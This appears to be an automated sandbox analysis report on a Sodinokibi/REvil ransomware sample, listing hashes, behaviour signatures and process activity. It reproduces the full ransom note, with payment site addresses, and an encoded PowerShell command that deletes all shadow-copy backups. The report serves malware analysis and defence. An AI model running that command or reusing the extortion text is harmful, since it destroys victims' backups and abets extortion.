Overview

overview

10

Static

static

10

8d7eaf2d46...18.exe

windows7-x64

10

8d7eaf2d46...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    128s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02-06-2024 08:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    8d7eaf2d466b138f7d3a12d17a1e3126

  • SHA1

    f75aee8361cfff77fdd045c32769e385d3e8f5df

  • SHA256

    64f3d2db7a782fef79f46763d4ee2f83de2d656ba5813e3b3d873c17dae3ca2e

  • SHA512

    eb28b302f0a858e636aca5a37897102af085cda436f15ead69761edcaa9275d6372ce1cf1164a45bebaeb68b8022202e0290d8cd0ef1b195f518fada6d2ce18b

  • SSDEEP

    3072:EJMawtnGqtWoKeZC62aoNUSnc6udZxnXa1:+w9vteQJYUocFdZF

Score
10/10
sodinokibipersistenceransomware

Malware Config

Extracted

Path

C:\Users\u82yk1-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion u82yk1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2502FDC5F027FAF1 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2502FDC5F027FAF1 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 7j8E10IhTiC6moPO4nOMZGeeKIfWyDO0lfiL756QqZy4PxfU5odWTYgIUxGeVQVN BC5rqeHkAkHk7k4whcyeBLJ/LsM95t10NABv/iOEeN8/mhFZN7IfeyjB/UB2FRW6 Q0XZojlBThZju7VSNQGoMx9GnbMKx++P2OjiuM5FbnmtnQoSexQG5Ir4whwMEv/v oAeuWxcjLA7dJOE/qTvAmMLQlbuLoSnwxR32g4aMAciT6CHS7VJ0oomVq6n6nyt5 zIBt1Lw2cge1KtIi3bdEfhnwtubEYLl4BQgmDI2dHsTZL/k2jNS9zXMXOzI9gzhg MlJFVhZJoFk+uQCOgIfQOM1aMspBblQiQeiLw53EdZc7oSpodeJkQJZlVN1dFi7H A03NbldOFDYN63JbVESvqkYNN6YDWA7d9xFzB4VV2CP0jcYG8EtTYo0TZ2e3UszG OHYjFn3eswWzzsJacw52mmSdvLJpWXQyZwK8moty0JKQL0aIQ5neuKRWE1GvwtkG 0ysegIsZnRMNdlIGwJN2opPK014t3yZgsSyA3ZDIK4V1Gap3tRD4n9YvaWQdokvL u3eJmZLxw39xUZ8qGWtileREGJIFIZOtYj1I0Eo6kytvtu+ZM7qHvw+TEQ8WJslW YfJiax9HKcihvbi7xCw4GenyM+J3Rfwwm/GEvz0mYUXO6i4oGIw7Kfnl35eedWgc 8873SLCIZOzIX1UvAYzrtL3Apdy9iSzDqELdtMCIjN23vPV0DXX6Dhmux/5pOOpz jnR6GcSJzlRTmlAyMD3g+0eIGS8qE//pFEs7VKMT1kh5unA8/uxgqcGqxx2S3HGm LmiAYDK0YJEyduMiyx4/LeTFBshdzLL7SnaReGiJ1YY0AUi0ClCZ4seqjmODPrac ENdS2AhSawkU4t/xeABP4g3gL3nSFcQT2aADz6HJyptEldOkECPwVRjKZAhFVSID 89iRI1DjiwRwymWeD0XAjJLjynugguSSSztJpAX41gYs8GoWoDkz60i3GJ1KSFtn DZ0gidj0vYvvAKlD8VKjvPotMam+Y4QJxuX7WYvUw8nXlA04RGmWVydmTDHXd/YJ Yw5G+QyYHyZj05u0DONlSyEUBuAXasgCzNtWqhLleks2XlhVMWMnZlgDgfbjRIeA IPk5xqTXad2cpcrnEuR/W+f52p/gmbU/o1icjQCLphL/mHq9h9NYm7SAzCl1oB3R pNWgVaadgwTK1/kNVkjqub/AaRC6+U2vkKizVb/J2RTP0Bx6rRkIpKEIGRB6EHig UvrTjhXULDXx3CNKVZr8RTFBHK8dP5jL/loOUKPRoltsKMPUNzXclbXtcsj6FjJb VCFptvV8SDtkc1FlzGl2U0cfpR1Cdg9zb7h99NRD Extension name: u82yk1 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2502FDC5F027FAF1

http://decryptor.cc/2502FDC5F027FAF1

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 39 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1672
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1728
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2844

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarDF2F.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\u82yk1-readme.txt
      Filesize

      6KB

      MD5

      7325477f11799a2099cce6868c5bd7e8

      SHA1

      bf2229b7cf8e1b9d02b191305ea140443581baa7

      SHA256

      47f605ae8a5af0702d3ade2f7c4413d6e4e97528e1fa8c0cd1bbc456af5760f0

      SHA512

      aa9aa38133b50bd1e8930458298d5847e3bc6c8ad3d6338ca8274a0b001b23d86f5b35dadbff1faec569ce0a257c8919fac85494600295360c9901dc4bd3cf70

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      9e3f247c97c241a5f4c7ea1264755992

      SHA1

      d8f8c29f3946fde8b3ce299cf0ec5faca2c0d76e

      SHA256

      936edcb68964d964049091dcc53df02d23898458875bac29339d20e04c828023

      SHA512

      111153837a9d28c1e9f592307f560414348968738567c3a8079e3ff930d3fe8453086e1cd80669fc9693c0a26cd4f2d3537719dda2652935631b0955afe3a61e

      Download Submit

    • memory/1672-7-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1672-9-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1672-10-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1672-11-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1672-12-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1672-8-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/1672-4-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1672-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1672-5-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB

      Download